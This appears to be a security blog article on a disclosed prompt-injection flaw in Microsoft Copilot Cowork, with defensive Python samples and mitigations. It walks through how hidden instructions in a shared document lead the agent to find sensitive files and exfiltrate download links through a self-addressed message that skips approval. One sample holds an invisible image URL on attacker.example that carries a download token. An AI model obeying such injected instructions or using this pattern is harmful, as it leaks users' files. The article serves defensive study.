Microsoft Copilot Cowork Exfiltrates Files: A Deep Dive into Agentic Security

As artificial intelligence moves from conversational chatbots to autonomous agents that perform tasks on our behalf, every data source an agent can read and every action it can take becomes part of the attack surface. A recent vulnerability disclosed by security research firm PromptArmor illustrates the shift. The researchers detailed how Microsoft Copilot Cowork, an agentic feature within the Microsoft 365 Frontier preview, can be exploited to silently exfiltrate sensitive files. For engineering and security teams, the disclosure shows what happens when indirect prompt injection meets broad Microsoft Graph access.
# What Happened: The Anatomy of the Exploit
The core of the vulnerability lies in a seemingly benign architectural design choice. Copilot Cowork is engineered to assist users by summarizing documents, managing schedules, and retrieving files. To ensure safety, Microsoft implemented safeguards requiring human approval before the agent takes "sensitive actions," such as sending emails or Microsoft Teams messages to external parties or colleagues.
However, PromptArmor researchers found a critical loophole: the human-in-the-loop approval process is entirely bypassed if the agent sends a message directly to the active user.
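The loophole can be modeled in a few lines. The sketch below is a hypothetical reconstruction, not Microsoft's implementation: the `AgentAction` type, the action names, and both functions are assumptions made for illustration. It contrasts an approval check that exempts self-addressed messages with a stricter variant that gates on the action type alone.

```python
from dataclasses import dataclass

# Hypothetical action names; not taken from any Microsoft API.
SENSITIVE_ACTIONS = frozenset({"send_email", "send_teams_message"})


@dataclass(frozen=True)
class AgentAction:
    kind: str         # e.g. "send_teams_message"
    recipient: str    # address of the intended recipient
    active_user: str  # address of the user the agent is acting for


def flawed_requires_approval(action: AgentAction) -> bool:
    """Models the reported loophole: self-addressed messages skip approval."""
    if action.kind not in SENSITIVE_ACTIONS:
        return False
    # The exemption below is the bug: the recipient being the active user
    # says nothing about whether the message body is safe to render.
    return action.recipient.lower() != action.active_user.lower()


def strict_requires_approval(action: AgentAction) -> bool:
    """Gates on the action type alone, regardless of who the recipient is."""
    return action.kind in SENSITIVE_ACTIONS


self_message = AgentAction(
    kind="send_teams_message",
    recipient="alice@example.com",
    active_user="alice@example.com",
)
print(flawed_requires_approval(self_message))  # False: no prompt is shown
print(strict_requires_approval(self_message))  # True: the user must confirm
```

The stricter variant costs the user an extra confirmation for harmless self-reminders, which is the usability trade-off an exemption like this presumably tried to avoid.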
An attacker can exploit this oversight through indirect prompt injection. The attack sequence unfolds as follows:
- The Poisoned Source: An attacker embeds malicious, hidden instructions inside a document, meeting invite, or shared resource that the target user is likely to ask Copilot to interact with or summarize.
- The Agentic Trigger: When the user prompts Copilot to summarize the poisoned document, the agent unknowingly ingests the attacker's hidden instructions alongside the legitimate content.
- Data Harvesting: The malicious prompt commands the agent to search for specific sensitive files (e.g., financial records, API keys, or HR data) using Microsoft Graph, forcing the system to generate pre-authenticated download links.
- The Zero-Click Exfiltration: The agent is instructed to message the user via Teams or Outlook. Crucially, the prompt tells the agent to format the message using Markdown or HTML, embedding an invisible `<img>` tag. The `src` attribute of this tag points to the attacker's external server, with the pre-authenticated download links appended as URL parameters.
When the user opens the message—an action that requires zero interaction beyond simply viewing their own chat or inbox—their client attempts to render the invisible image. This silently fires a web request, sending the sensitive download links directly to the attacker.
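To make the exfiltration channel concrete, the following sketch inspects a message body and reports every remote image URL together with the query parameters a client would transmit when rendering it. It is a minimal illustration using only the Python standard library. The hostnames, the parameter name `d`, and the sample message are invented for the example, and the sketch handles HTML only, so Markdown would have to be rendered to HTML first.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


class RemoteImageFinder(HTMLParser):
    """Collects the src of every <img> tag that points at an http(s) URL."""

    def __init__(self):
        super().__init__()
        self.remote_sources = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        src = dict(attrs).get("src") or ""
        if urlsplit(src).scheme in ("http", "https"):
            self.remote_sources.append(src)


def leaked_parameters(message_html):
    """Maps each remote image URL to its decoded query parameters."""
    finder = RemoteImageFinder()
    finder.feed(message_html)
    finder.close()
    return {src: parse_qs(urlsplit(src).query) for src in finder.remote_sources}


# Invented sample: a 1x1 image whose query string carries a download link.
message = (
    "<p>Your summary is ready.</p>"
    '<img src="https://attacker.example/p.png'
    '?d=https%3A%2F%2Fcontoso.example%2Fdl%3Ftoken%3Dabc" width="1" height="1">'
)

for url, params in leaked_parameters(message).items():
    print(urlsplit(url).hostname, params)
```

Anything that appears in the decoded parameters leaves the tenant the moment the client fetches the image, with no click required.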
# Why It Matters: Broad Permissions Meet Flawed Safeguards
The implications of this vulnerability extend far beyond a standard phishing attack or a typical data leak. It highlights severe structural issues in how AI agents handle permissions and trust boundaries within enterprise environments.
- Total Permission Inheritance: Copilot Cowork operates with the full Microsoft Graph permissions of the active user. If an organization suffers from "oversharing"—where internal permissions in SharePoint or OneDrive are too broad—the agent becomes a devastating force multiplier. It can instantly discover and exfiltrate data the user didn't even know they had access to.
- Zero-Click Execution: Traditional security awareness training heavily emphasizes teaching employees not to click suspicious links. In this scenario, simply opening a Teams message generated by their own corporate AI assistant triggers the exfiltration. There is no malicious link for the user to avoid clicking.
- Subverting DLP Controls: Because the initial data movement is entirely internal (Copilot interacting with Microsoft Graph and messaging the user internally), standard Data Loss Prevention (DLP) tools monitoring outbound enterprise traffic are unlikely to flag the behavior until the final, obfuscated web request is made via the image load.
# Technical Implications: Beyond the LLM
One of the most notable technical takeaways from PromptArmor's disclosure is that the exploit is fundamentally model-agnostic. While the research demonstrated the attack using Claude Opus 4.7 (which powers the Copilot Cowork feature preview), the underlying flaw is neither an AI hallucination nor a bypass of model safety guardrails. It is a traditional architectural logic flaw exacerbated by AI capabilities.
| Attack Component | Technical Mechanism | Vulnerability Type |
|---|---|---|
| Ingestion | Unsanitized processing of external content during Retrieval-Augmented Generation (RAG). | Indirect Prompt Injection |
| Execution | Bypassing authorization and approval checks for self-addressed messages. | Business Logic Bypass |
| Exfiltration | Abusing client-side rendering of external assets within internal communication apps. | Zero-Click Data Exfiltration via Remote Image Load |
This demonstrates that securing agentic systems requires more than just fine-tuning the LLM to refuse malicious prompts. It requires robust systems engineering, strict contextual separation of data inputs, and zero-trust validation applied to the agent's output mechanisms.
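One way to approximate contextual separation is to track where each piece of context came from and tighten the rules once untrusted content has entered the session. The sketch below is an assumption-laden illustration rather than a description of how Copilot works: the `Source` categories, the `AgentSession` type, and the tool names are all hypothetical. It is meant as an additional layer on top of approval checks, not a replacement for them.

```python
from dataclasses import dataclass, field
from enum import Enum


class Source(Enum):
    USER = "user"            # typed by the active user
    RETRIEVED = "retrieved"  # documents, invites, emails, shared resources


# Hypothetical tool names; tools listed here have no side effects.
READ_ONLY_TOOLS = frozenset({"summarize"})


@dataclass
class AgentSession:
    # Each entry is a (source, text) pair, kept in arrival order.
    context: list = field(default_factory=list)

    def add(self, source: Source, text: str) -> None:
        self.context.append((source, text))

    @property
    def tainted(self) -> bool:
        """True once any non-user content has entered the context."""
        return any(source is not Source.USER for source, _ in self.context)


def needs_confirmation(session: AgentSession, tool: str) -> bool:
    """Require confirmation for side-effecting tools in a tainted session."""
    return session.tainted and tool not in READ_ONLY_TOOLS


session = AgentSession()
session.add(Source.USER, "Summarize the shared planning document.")
print(needs_confirmation(session, "send_teams_message"))  # False

session.add(Source.RETRIEVED, "...document text, possibly with hidden instructions...")
print(needs_confirmation(session, "send_teams_message"))  # True
print(needs_confirmation(session, "summarize"))           # False
```

The design choice here is deliberately coarse: the policy does not try to detect malicious instructions, it only assumes that any retrieved text might contain them.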
# What's Next: Mitigating Agentic Risks
For developers and IT administrators utilizing Microsoft 365 or building their own internal AI agents, this incident provides a clear roadmap for necessary mitigations.
- Restrict Content Discovery: Organizations must aggressively manage SharePoint and OneDrive permissions. Security teams should utilize tenant settings to exclude highly sensitive sites from Copilot's search index, limiting the blast radius of a compromised agent.
- Implement 'Block Download' Policies: By configuring SharePoint policies to block downloads for certain sensitive libraries, organizations can prevent the Graph API from generating the pre-authenticated links required for this specific exfiltration technique.
- Sanitize Markdown and HTML Output: Application developers building AI clients must treat LLM output as untrusted user input. Rendering engines should strictly sanitize or completely block external asset loading (like remote images) within agent-generated messages.
- Enforce True Human-in-the-Loop: Agent actions that trigger state changes or network requests must require explicit user confirmation, regardless of whether the recipient is internal, external, or the user themselves.
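The output-sanitization mitigation above can be sketched with the Python standard library. This is a minimal illustration under stated assumptions: the allowlisted host is invented, and the sketch only removes `<img>` tags whose source is not on the allowlist. Other remote-loading vectors (stylesheets, iframes, CSS `url()` references, scripts) are not handled, so a production client would more likely rely on a maintained, allowlist-based HTML sanitizer.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would choose its own hosts.
ALLOWED_IMAGE_HOSTS = frozenset({"assets.contoso.example"})
VOID_TAGS = frozenset({"br", "hr", "img"})


def image_host(src):
    """Returns the lowercased host of src, or None if absent or malformed."""
    try:
        return urlsplit(src).hostname
    except ValueError:
        return None


class ImageStripper(HTMLParser):
    """Re-emits HTML, dropping <img> tags that load from unlisted hosts."""

    def __init__(self, allowed_hosts):
        super().__init__(convert_charrefs=True)
        self.allowed_hosts = allowed_hosts
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            src = dict(attrs).get("src") or ""
            # Relative, data:, and malformed sources have no allowlisted
            # host, so they are dropped as well (a conservative default).
            if image_host(src) not in self.allowed_hosts:
                return
        rendered = "".join(
            ' {}="{}"'.format(name, escape(value or "")) for name, value in attrs
        )
        self.out.append("<{}{}>".format(tag, rendered))

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS:
            self.out.append("</{}>".format(tag))

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def strip_untrusted_images(message_html, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    parser = ImageStripper(allowed_hosts)
    parser.feed(message_html)
    parser.close()
    return "".join(parser.out)


dirty = (
    "<p>Done &amp; sent.</p>"
    '<img src="https://attacker.example/p.png?d=secret">'
    '<img src="https://assets.contoso.example/logo.png">'
)
print(strip_untrusted_images(dirty))
```

Because the image tag never reaches the renderer, the client never issues the request that would carry the download links to the attacker's server.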
# Conclusion
The Microsoft Copilot Cowork vulnerability uncovered by PromptArmor is a watershed moment for AI security. As we move from systems that simply answer questions to autonomous systems that take action across our entire digital workspace, the complexity of securing these workflows increases dramatically. Embracing agentic AI means we must fundamentally rethink our trust boundaries, assuming that our data sources are hostile and our AI assistants are inherently gullible. Securing the future of work requires extreme vigilance, strict permission hygiene, and a relentless zero-trust approach to artificial intelligence integrations.